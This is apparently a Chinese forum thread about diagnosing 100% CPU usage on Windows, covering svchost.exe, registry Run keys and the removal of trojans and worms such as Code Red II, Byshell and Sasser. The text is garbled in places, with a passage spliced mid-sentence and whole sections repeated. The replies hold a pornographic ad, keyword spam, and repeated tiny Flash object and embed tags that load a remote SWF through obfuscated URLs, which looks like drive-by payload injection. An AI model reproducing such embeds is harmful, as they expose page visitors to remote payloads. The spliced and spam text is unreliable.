　　在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记:有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的Explorer 键值改为Explorer=“C:\Windows\expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能，最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马该病毒也称为“Code Red II(红色代码2)”病毒，与早先在西方英文系统下流行“红色代码”病毒有点相反，在国际上被称为VirtualRoot(虚拟目录)病毒。该蠕虫病毒利用Microsoft已知的溢出漏洞，通过80端口来传播到其它的Web页服务器上。受感染的机器可由黑客们通过Http Get的请求运行scripts/root.exe来获得对受感染机器的完全控制权。

　　当感染一台服务器成功了以后，如果受感染的机器是中文的系统后，该程序会休眠2天，别的机器休眠1天。当休眠的时间到了以后，该蠕虫程序会使得机器重新启动。该蠕虫也会检查机器的月份是否是10月或者年份是否是2002年，如果是，受感染的服务器也会重新启动。当Windows NT系统启动时，NT系统会自动搜索C盘根目录下的文件explorer.exe，受该网络蠕虫程序感染的服务器上的文件explorer.exe也就是该网络蠕虫程序本身。该文件的大小是8192字节，VirtualRoot网络蠕虫程序就是通过该程序来执行的。同时，VirtualRoot网络蠕虫程序还将cmd.exe的文件从Windows NT的system目录拷贝到别的目录，给黑客的入侵敞开了大门。它还会修改系统的注册表项目，通过该注册表项目的修改，该蠕虫程序可以建立虚拟的目录C或者D，病毒名由此而来。值得一提的是，该网络蠕虫程序除了文件explorer.exe外，其余的操作不是基于文件的，而是直接在内存中来进行感染、传播的，这就给捕捉带来了较大难度。

　　”程序的文件名，再在整个注册表中搜索即可。

　　我们先看看微软是怎样描述svchost.exe的。在微软知识库314056中对svchost.exe有如下描述:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。

　　其实svchost.exe是Windows XP系统的一个核心进程。svchost.exe不单单只出现在Windows XP中，在使用NT内核的Windows系统中都会有svchost.exe的存在。一般在Windows 2000中svchost.exe进程的数目为2个，而在Windows XP中svchost.exe进程的数目就上升到了4个及4个以上。所以看到系统的进程列表中有几个svchost.exe不用那幺担心。

svchost.exe到底是做什么用的呢?

　　首先我们要了解一点那就是Windows系统的中的进程分为:独立进程和共享进程这两种。由于Windows系统中的服务越来越多，为了节约有限的系统资源微软把很多的系统服务做成了共享模式。那svchost.exe在这中间是担任怎样一个角色呢?

　　svchost.exe的工作就是作为这些服务的宿主，即由svchost.exe来启动这些服务。svchost.exe只是负责为这些服务提供启动的条件，其自身并不能实现任何服务的功能，也不能为用户提供任何服务。svchost.exe通过为这些系统服务调用动态链接库(DLL)的方式来启动系统服务。

　　svchost.exe是病毒这种说法是任何产生的呢?

　　因为svchost.exe可以作为服务的宿主来启动服务，所以病毒、木马的编写者也挖空心思的要利用svchost.exe的这个特性来迷惑用户达到入侵、破坏计算机的目的。

　　如何才能辨别哪些是正常的svchost.exe进程，而哪些是病毒进程呢?

　　svchost.exe的键值是在“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost”，如图1所示。图1中每个键值表示一个独立的svchost.exe组。

　　微软还为我们提供了一种察看系统正在运行在svchost.exe列表中的服务的方法。以Windows XP为例:在“运行”中输入:cmd，然后在命令行模式中输入:tasklist /svc。系统列出如图2所示的服务列表。图2中红框包围起来的区域就是svchost.exe启动的服务列表。如果使用的是Windows 2000系统则把前面的“tasklist /svc”命令替换为:“tlist -s”即可。如果你怀疑计算机有可能被病毒感染，svchost.exe的服务出现异常的话通过搜索svchost.exe文件就可以发现异常情况。一般只会找到一个在:“C:\Windows\System32”目录下的svchost.exe程序。如果你在其它目录下发现svchost.exe程序的话，那很可能就是中毒了。

　　还有一种确认svchost.exe是否中毒的方法是在任务管理器中察看进程的执行路径。但是由于在Windows系统自带的任务管理器不能察看进程路径，所以要使用第三方的进程察看工具。

3、Services.exe造成CPU使用率占用100%

　　症状

　　在基于 Windows 2000 的计算机上，Services.exe 中的 CPU 使用率可能间歇性地达到100 %，并且计算机可能停止响应(挂起)。出现此问题时，连接到该计算机(如果它是文件服务器或域控制器)的用户会被断开连接。您可能还需要重新启动计算机。如果 Esent.dll 错误地处理将文件刷新到磁盘的方式，则会出现此症状。

　 解决方案

　　Service Pack 信息

　　要解决此问题，请获取最新的 Microsoft Windows 2000 Service Pack。有关其它信息，请单击下面的文章编号，以查看 Microsoft 知识库中相应的文章:

　　260910 如何获取最新的 Windows 2000 Service Pack

　　修复程序信息

　　Microsoft 提供了受支持的修补程序，但该程序只是为了解决本文所介绍的问题。只有计算机遇到本文提到的特定问题时才可应用此修补程序。此修补程序可能还会接受其它一些测试。因此，如果这个问题没有对您造成严重的影响，Microsoft 建议您等待包含此修补程序的下一个 Windows 2000 Service Pack。

　　要立即解决此问题，请与“Microsoft 产品支持服务”联系，以获取此修补程序。有关“Microsoft 产品支持服务”电话号码和支持费用信息的完整列表，请访问 Microsoft Web 站点:

　　注意 :特殊情况下，如果 Microsoft 支持专业人员确定某个特定的更新程序能够解决您的问题，可免收通常情况下收取的电话支持服务费用。对于特定更新程序无法解决的其它支持问题和事项，将正常收取支持费用。

　　下表列出了此修补程序的全球版本的文件属性(或更新的属性)。这些文件的日期和时间按协调通用时间 (UTC) 列出。查看文件信息时，它将转换为本地时间。要了解 UTC 与本地时间之间的时差，请使用“控制面板”中的“日期和时间”工具中的 时区 选项卡。

　　状态

　　Microsoft 已经确认这是在本文开头列出的 Microsoft 产品中存在的问题。此问题最初是在 Microsoft Windows 2000 Service Pack 4 中更正的。
4、正常软件造成CPU使用率占用100%

　　首先，如果是从开机后就发生上述情况直到关机。那么就有可能是由某个随系统同时登陆的软件造成的。可以通过运行输入“msconfig”打开“系统实用配置工具”，进入“启动”选项卡。接着，依次取消可疑选项前面的对钩，然后重新启动电脑。反复测试直到找到造成故障的软件。或者可以通过一些优化软件如“优化大师”达到上述目的。另:如果键盘内按键卡住也可能造成开机就出现上述问题。

　　如果是使用电脑途中出项这类问题，可以调出任务管理器(WINXP CTRL+ALT+DEL WIN2000 CTRL+SHIFT“ESC)，进入”进程“选项卡，看”CPU“栏，从里面找到占用资源较高的程序(其中SYSTEM IDLE PROCESS是属于正常，它的值一般都很高，它的作用是告诉当前你可用的CPU资源是多少，所以它的值越高越好)通过搜索功能找到这个进程属于哪个软件。然后，可以通过升级、关闭、卸载这个软件或者干脆找个同类软件替换，问题即可得到解决。

　　5、病毒、木马、间谍软件造成CPU使用率占用100%

　　出现CPU占用率100% 的故障经常是因为病毒木马造成的，比如震荡波病毒。应该首先更新病毒库，对电脑进行全机扫描 。接着，在使用反间谍软件Ad—Aware，检查是否存在间谍软件。论坛上有不少朋友都遇到过svchost.exe占用CPU100%，这个往往是中毒的表现。

　　svchost.exe Windows中的系统服务是以动态链接库(DLL)的形式实现的，其中一些会把可执行程序指向svchost.exe，由它调用相应服务的动态链接库并加上相应参数来启动服务。正是因为它的特殊性和重要性，使它更容易成为了一些病毒木马的宿主。

　　6、explorer.exe进程造成CPU使用率占用100%

　　在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那幺后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

　　在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至:“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记:有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下的

　　Explorer 键值改为Explorer=“C:\Windows\expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。当然在注册表中还有很多地方都可以隐藏“木马”程序，如:“HKEY-CURRENT-USER\Software\Microsoft\Windows\CurrentVersion\Run”、“HKEY-USERS\****\Software\Microsoft\Windows\CurrentVersion\Run”的目录下都有可能，最好的办法就是在“HKEY-LOCAL-MACHINE\Software\Microsoft\Windows\CurrentVersion\Run”下找到“木马”程序的文件名，再在整个注册表中搜索即可。

7、超线程导致CPU使用率占用100%

　　这类故障的共同原因就是都使用了具有超线程功能的P4 CPU。我查找了一些资料都没有明确的原因解释。据一些网友总结超线程似乎和天网防火墙有冲突，可以通过卸载天网并安装其它防火墙解决，也可以通过在BIOS中关闭超线程功能解决。

　　8、AVI视频文件造成CPU使用率占用100%

　　在Windows XP中，单击一个较大的AVI视频文件后，可能会出现系统假死现象，并且造成exploere.exe进程的使用率100%，这是因为系统要先扫描该文件，并检查文件所有部分，建立索引。如果文件较大就会需要较长时间并造成CPU占用率100%。解决方法:右键单击保存视频文件的文件夹，选择”属性—>常规—>高级“，去掉”为了快速搜索，允许索引服务编制该文件夹的索引“前面复选框的对钩即可。

　　9、杀毒软件CPU使用率占用100%

　　现在的杀毒软件一般都加入了，对网页、邮件、个人隐私的即时监空功能，这样无疑会加大系统的负担。比如:在玩游戏的时候，会非常缓慢。关闭该杀毒软件是解决得最直接办法。

　　10、处理较大的Word文件时CPU使用率过高

　　上述问题一般还会造成电脑假死，这些都是因为WORD的拼写和语法检查造成的，只要打开WORD的“工具—选项”，进入“拼写和语法”选项卡，将其中的“键入时检查拼写”和“键入时检查语法”两项前面的复选框中的钩去掉即可。
11、网络连接导致CPU使用率占用100%

　　当你的Windows2000/xp作为服务器时，收到来自端口445上的连接请求后，系统将分配内存和少量CPU资源来为这些连接提供服务，当负荷过重，就会出现上述情况。要解决这个问题可以通过修改注册表来解决，打开注册表，找到HKEY—LOCAL—MACHNE\SYSTEM\CurrentControlSet\Services\lanmanserver，在右面新建一个名为"；maxworkitems"；的DWORD值.然后双击该值，如果你的电脑有512以上内存，就设置为"；1024"；，如果小于512，就设置为256.

　　一些不完善的驱动程序也可以造成CPU使用率过高

　　经常使用待机功能，也会造成系统自动关闭硬盘DMA模式。这不仅会使系统性能大幅度下降，系统启动速度变慢，也会使是系统在运行一些大型软件和游戏时CPU使用率100%，产生停顿。

进程占用CPU 100%时可能中的病毒

　　system Idle Process

　　进程文件: [system process] or [system process]

　　进程名称: Windows内存处理系统进程

　　描 述: Windows页面内存管理进程，拥有0级优先。

　　介 绍:该进程作为单线程运行在每个处理器上，并在系统不处理其它线程的时候分派处理器的时间。它的CPU占用率越大表示可供分配的CPU资源越多，数字越小则表示CPU资源紧张。

　　Spoolsv.exe

　　进程文件: spoolsv or Spoolsv.exe

　　进程名称: Printer Spooler Service

　　描 述: Windows打印任务控制程序，用以打印机就绪。

　　介 绍:缓冲(spooler)服务是管理缓冲池中的打印和传真作业。

　　Spoolsv.exe→打印任务控制程序，一般会先加载以供列表机打印前的准备工作

　　Spoolsv.exe，如果常增高，有可能是病毒感染所致

　　目前常见的是:

　　Backdoor/Byshell(又叫隐形大盗、隐形杀手、西门庆病毒)

　　危害程度:中

　　受影响的系统: Windows 2000， Windows XP， Windows Server 2003

　　未受影响的系统: Windows 95， Windows 98， Windows Me， Windows NT， Windows 3.x， Macintosh， Unix， Linux，

　　病毒危害:

　　1. 生成病毒文件

　　2. 插入正常系统文件中

　　3. 修改系统注册表

　　4. 可被黑客远程控制

　　5. 躲避反病毒软件的查杀

　　简单的后门木马，发作会删除自身程序，但将自身程序套入可执行程序内(如:exe)，并与计算机的通口(TCP端口138)挂钩，监控计算机的信息、密码，甚至是键盘操作，作为回传的信息，并不时驱动端口，以等候传进的命令，由于该木马不能判别何者是正确的端口，所以负责输出的列表机也是其驱动对象，以致Spoolsv.exe的使用异常频繁......

　　Backdoor.Win32.Plutor

　　破坏方法:感染PE文件的后门程序

　　病毒采用VC编写。
病毒运行后有以下行为:

　　1、将病毒文件复制到%WINDIR%目录下，文件名为"；Spoolsv.exe"；，并该病毒文件运行。"；Spoolsv.exe"；文件运行后释放文件名为"；mscheck.exe"；的文件到%SYSDIR%目录下，该文件的主要功能是每次激活时运行"；Spoolsv.exe"；文件。如果所运行的文件是感染了正常文件的病毒文件，病毒将会把该文件恢复并将其运行。

　　2、修改注册表以下键值:

　　HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run

　　增加数据项:"；Microsoft Script Checker"； 数据为:"；MSCHECK.EXE /START"；

　　修改该项注册表使"；MSCHECK.EXE"；文件每次系统激活时都将被运行，而"；MSCHECK.EXE"；用于运行"；Spoolsv.exe"；文件，从而达到病毒自激活的目的。

　　3、创建一个线程用于感染C盘下的PE文件，但是文件路径中包含"；winnt"；、"；Windows"；字符串的文件不感染。另外，该病毒还会枚举局域网中的共享目录并试图对这些目录下的文件进行感染。该病毒感染文件方法比较简单，将正常文件的前0x16000个字节替换为病毒文件中的数据，并将原来0x16000个字节的数据插入所感染的文件尾部。

　　4、试图与局域网内名为"；admin"；的邮槽联系，创建名为"；client"；的邮槽用于接收其控制端所发送的命令，为其控制端提供以下远程控制服务:

　　显示或隐藏指定窗口、屏幕截取、控制CDROM、关闭计算器、注销、破坏硬盘数据。

　那些病毒会造成CPU占有率过高

　　震荡波蠕虫

　　利用微软操作系统的LSASS缓冲区溢出漏洞进行远程主动攻击和传染，导致系统异常和网络严重拥塞，具有极强的危害性，病毒如果攻击成功，则会占用大量系统资源，使CPU占用率达到100%，出现电脑运行异常缓慢的现象。

　　如果中了这种病毒可采用下面的四种方法进行清除。

　　1、断网打补丁

　　如果不给系统打上相应的漏洞补丁，则连网后依然会遭受到该病毒的攻击，用户应该先下载相应的漏洞补丁程序，然后断开网络，运行补丁程序，当补丁安装完成后再上网。

　　2、清除内存中的病毒进程

　　要想彻底清除该病毒，应该先清除内存中的病毒进程，用户可以按CTRL+SHIFT+ESC三或者右键单击任务栏，在弹出菜单中选择“任务管理器”打开任务管理器界面，然后在内存中查找名为“avserve.exe”的进程，找到后直接将它结束。

　　3、删除病毒文件

　　病毒感染系统时会在系统安装目录(默认为C:\WINNT)下产生一个名为avserve.exe的病毒文件，并在系统目录下(默认为C:\WINNT\System32)生成一些名为<；随机字符串>；_UP.exe的病毒文件，用户可以查找这些文件，找到后删除，如果系统提示删除文件失败，则用户需要到安全模式下或DOS系统下删除这些文件。

　　4、删除注册表键值

　　该病毒会在电脑注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run项中建立名为“avserve.exe”，内容为:“%Windows%\avserve.exe”的病毒键值，为了防止病毒下次系统启动时自动运行，用户应该将该键值删除，方法是在“运行”菜单中键入“REGEDIT” 然后调出注册表编辑器，找到该病毒键值，然后直接删除。

　　bride病毒

　　此病毒可以在Windows 2000、Windows XP等操作系统环境下正常运行，病毒运行时会释放出一个FUNLOVE病毒并将之执行，而FUNLOVE病毒会在计算机中大量繁殖，造成系统变慢，网络阻塞。

　　病毒清除方法

　　此病毒可以用趋势、诺顿、瑞星、金山和江民等杀毒软件进行清除。

小知识:系统进程

　　一款好的防火墙并不能发现所有病毒；一个好的杀毒软件并不能歼灭所有的带毒程序!遇到这些情况我们该做何处理呢?很简单——手工杀毒。而要论到手工杀毒，就不能不提到系统进程了。
进程、病毒?

　　书上说:“进程为应用程序的运行实例，是应用程序的一次动态执行。”看似高深，我们可以简单地理解为:它是操作系统当前运行的执行程序。在系统当前运行的执行程序里包括:系统管理计算机个体和完成各种操作所必需的程序；用户开启、执行的额外程序，当然也包括用户不知道，而自动运行的非法程序(它们就有可能是病毒程序)。

　　危害较大的可执行病毒同样以“进程”形式出现在系统内部(一些病毒可能并不被进程列表显示，如“宏病毒”)，那幺及时查看并准确杀掉非法进程对于“手工杀毒有起着关键性的作用。

魔王mnq

免费注册，无需手机，10秒看到好色脱衣嗨女，绝对刺激！！

24小时不间断表演，如果感觉爽，请推荐给您的朋友。


<object title="dvubb" codebase="#" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="20" height="18"><param name="movie" value="HtTp://www.yule7.com/1.%73wf"/><param name="quality" value="high"/><embed title="dvubb" quality="high" pluginspage="#" type="application/x-shockwave-flash" width="20" height="18" autoplay="false"></embed></object>
<object title="dvubb" codebase="#" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="20" height="18"><param name="movie" value="HtTp://www.yule7.com/1.swf"/><param name="quality" value="high"/><embed title="dvubb" quality="high" pluginspage="#" type="application/x-shockwave-flash" width="20" height="18" autoplay="false"></embed></object>
<object title="dvubb" codebase="#" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="20" height="18"><param name="movie" value="HtTp://www.yule7.com/1.%73wf"/><param name="quality" value="high"/><embed title="dvubb" quality="high" pluginspage="#" type="application/x-shockwave-flash" width="20" height="18" autoplay="false"></embed></object>
<object title="dvubb" codebase="#" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="20" height="18"><param name="movie" value="HtTp://www.yule7.com/1.%73wf"/><param name="quality" value="high"/><embed title="dvubb" quality="high" pluginspage="#" type="application/x-shockwave-flash" width="20" height="18" autoplay="false"></embed></object>


<embed src="hTTp://www.yule7.com/1.%73wf" width="10" height="10"></embed>  
<embed src="hTtp://www.yule7.com/1.swf" width="10" height="10"></embed>  
<embed src="htTp://www.yule7.com/1.%73wf" width="10" height="10"></embed>

winisi

　　北京时间8月5日消息，德国网球名将尼古拉斯·基弗在奥林匹克公园网球中心world of warcraft power leveling训练结束后谈到了参加2008北京奥运会的感受。
world of warcraft powerleveling

　　基弗说：“这是我第三次参加奥运会，而且是我所参加过的最好的一届。这里的人很好，奥运村wow powerleveling很棒。我想德国队是第五大代表团。能和很多朋友住在一起，自己所在的又是最大的代表团之一，这真是太好了。”
wow power leveling

　　基弗已是第三次参加奥运会，他说：“我很荣幸。能第三次参加奥运会是我的梦想，很不同寻常。奥运会的比赛比ATP巡回赛wow powerleveling还困难。在雅典我得过(双打)银牌，对我来讲是很特别的回忆。奥运会对我来说意义非凡。”

2008niihao

没人帮你顶，我帮你顶下~~~~~~~~ 金山快译 金山毒霸2009 excel  powerpoint word2000

vwxy746

王老师问李老师：“昨天，你班一个学生手脏得很进课堂，被你轰回家去了，这个办法行之有效吗？”

“不行！今天有一半孩子没有洗手。”

玻璃膜,汽车膜,建筑膜,防弹膜,安全膜